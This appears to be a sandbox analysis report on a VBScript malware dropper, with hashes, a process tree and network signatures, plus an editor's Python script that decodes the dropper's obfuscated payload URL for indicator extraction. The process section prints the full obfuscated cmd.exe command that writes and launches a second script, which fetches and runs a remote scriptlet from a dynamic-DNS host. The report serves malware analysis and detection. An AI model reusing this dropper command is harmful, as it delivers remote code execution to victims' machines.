Analysis
- max time kernel: 43s
- max time network: 48s
- platform: windows7_x64
- resource: win7-20220414-es
- submitted: 23-06-2022 14:52
Static task
- static1
Behavioral tasks
- behavioral1: sample 27.FICH_33O3LcBJBPsZDE6v.vbs on resource win7-20220414-es
- behavioral2: sample 27.FICH_33O3LcBJBPsZDE6v.vbs on resource win10v2004-20220414-es
- behavioral3: sample _.exe on resource win7-20220414-es
General
- Target: 27.FICH_33O3LcBJBPsZDE6v.vbs
- Size: 7KB
- MD5: 25926cb2b53f3be53b0999621d1f1ccf
- SHA1: 9a073d7bd4b2f730f157f4612551504d16607256
- SHA256: 665b376283df9d5e962860cc1d6cc2ec05157afff65d44b6d9ff64d8b6393941
- SHA512: 8542f4c0815e8f161c4dc2151252454fc2dcc86da0a3160724f54d702d3ea99805be006d5bfdde65f68f3aba6556892d735515824a3fdf24f9de0dd05dc469bd
Malware Config
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes:
  flow  pid  process
  4     516  WScript.exe
  5     516  WScript.exe
  6     516  WScript.exe
  7     516  WScript.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (Generic signature description: nothing else in this report, which shows a single 275B dropped script and no file encryption or mass file activity, supports a ransomware classification.)
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (each parent-to-child write is recorded three times, so 15 rows describe 5 edges):
  pid   process      target pid  target process
  1756  WScript.exe  1076        cmd.exe      (x3)
  1076  cmd.exe      1232        cmd.exe      (x3)
  1076  cmd.exe      1200        cmd.exe      (x3)
  1200  cmd.exe      2044        cmd.exe      (x3)
  2044  cmd.exe      516         WScript.exe  (x3)
Processes
Chain summary: the submitted .vbs (PID 1756) spawns cmd.exe, which echoes a second VBScript into C:\Users\Public\L8DPGAESQ5.vbs and then starts it with WScript.exe; that second WScript.exe instance (PID 516) is the process flagged for the network requests. Depth markers below follow the report's own tree.
- [1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27.FICH_33O3LcBJBPsZDE6v.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" cmD ^/V/D/c EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function > nul > %Public%\^L8DPGAESQ5.vbs |^start cMd /c start %Public%\^L8DPGAESQ5.vbs
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function 1>C:\Users\Public\L8DPGAESQ5.vbs"
    - [3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" start cMd /c start C:\Users\Public\L8DPGAESQ5.vbs"
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        Command line: cMd /c start C:\Users\Public\L8DPGAESQ5.vbs
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\System32\WScript.exe
          Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\L8DPGAESQ5.vbs"
          Signatures: Blocklisted process makes network request
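Added example (editor's code, not part of the sandbox report and not the malware author's script): the dropped L8DPGAESQ5.vbs builds its payload URL with two nested Replace() calls and hands the result to GetObject(). With the script: moniker, GetObject fetches the URL and runs the scriptlet it returns, which is why the second WScript.exe instance (PID 516) is the one flagged for network requests. The Python below replays both substitution layers on the literal taken from the command line above, parses the resulting moniker into transport, host and path, and generalises the step to every quoted literal in a script body. The DROPPED_VBS text is reconstructed from the echo'd command line on this page; the names jzYA and AUrt are the dropper's own, everything else (function names, the constructed input) is the editor's.

```python
"""Replay the two string-substitution layers of the dropped VBScript so the
GetObject() scriptlet moniker can be read and blocked without running it.
Editor's example: only STAGE2_LITERAL and DROPPED_VBS come from the report."""
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Literal copied from the echo'd command line in the report (stage-2 dropper).
STAGE2_LITERAL = "S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="

# Constructed stand-in for C:\Users\Public\L8DPGAESQ5.vbs, rebuilt from the
# text that cmd.exe echoes into it (the report does not show the file body).
DROPPED_VBS = (
    'function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: '
    'bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): '
    'GetObject(AUrt(bZgICx10gbdN43)): '
    'function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function'
)

MONIKER_RE = re.compile(r"^(script):(.+)$", re.IGNORECASE)


def vbs_replace(expr: str, find: str, replace_with: str) -> str:
    """Mirror VBScript Replace() with its defaults: start=1, count=-1 (every
    occurrence) and binary (case-sensitive) compare. str.replace matches that."""
    return expr.replace(find, replace_with)


def jzYA(s: str) -> str:
    """Dropper's first layer: every 'w' was encoded as the token 'oIf6'."""
    return vbs_replace(s, "oIf6", "w")


def AUrt(s: str) -> str:
    """Dropper's second layer: strip the '=' padding scattered through the string."""
    return vbs_replace(s, "=", "")


def deobfuscate_moniker(literal: str = STAGE2_LITERAL) -> str:
    """Apply the layers in the order GetObject(AUrt(jzYA(literal))) evaluates them."""
    return AUrt(jzYA(literal))


def parse_scriptlet_moniker(moniker: str) -> Dict[str, str]:
    """Split a 'script:<url>' COM moniker into indicator fields. GetObject on
    this moniker downloads <url> and executes the scriptlet (.sct) it returns,
    so the host and path are the parts worth blocking and hunting on."""
    m = MONIKER_RE.match(moniker)
    if not m:
        raise ValueError(f"not a script: moniker: {moniker!r}")
    url = m.group(2)
    parts = urlsplit(url)
    return {
        "moniker_scheme": m.group(1).lower(),
        "url": url,
        "transport": parts.scheme.lower(),
        "host": parts.hostname or "",
        "path": parts.path,
    }


def extract_indicators(vbs_source: str) -> List[Dict[str, str]]:
    """Generalisation of the single case above: run every quoted literal in a
    VBScript body through the same two layers and keep those that decode to a
    script: moniker. Literals that decode to something else are ignored."""
    found = []
    for lit in re.findall(r'"([^"]*)"', vbs_source):
        decoded = deobfuscate_moniker(lit)
        if MONIKER_RE.match(decoded):
            found.append(parse_scriptlet_moniker(decoded))
    return found


if __name__ == "__main__":
    print(deobfuscate_moniker())
    for ioc in extract_indicators(DROPPED_VBS):
        print(ioc)
```

Because VBScript's Replace() defaults to a binary compare and replaces all occurrences, a plain str.replace is an exact stand-in; a deobfuscator that lowercases or stops at the first hit would decode a different string. hopto.org is a No-IP dynamic DNS zone, so the indicator to block or hunt on is the full host wfux02.hopto.org, not the zone.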
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\L8DPGAESQ5.vbs
  Filesize: 275B
  MD5: 6bac93f3f5d256c436d31e9496f33353
  SHA1: 906d675da017b53b3051cca5bf270655d68bc358
  SHA256: f7c07264ac5931edc61c2bf838cffba41e119d9780876904c1c2d817ce5810c6
  SHA512: ab576653b6030eec23d241a37805bad26cc13b38a0bf8957bbea0c010fd910e15ceece6fd4bacc784aadc1f8b1ed55c64b93ada35bcdfdb98d16afeb5b7c4804
- memory/516-72-0x0000000000000000-mapping.dmp
- memory/1076-55-0x0000000000000000-mapping.dmp
- memory/1200-57-0x0000000000000000-mapping.dmp
- memory/1232-56-0x0000000000000000-mapping.dmp
- memory/1756-54-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp
  Filesize: 8KB
- memory/2044-58-0x0000000000000000-mapping.dmp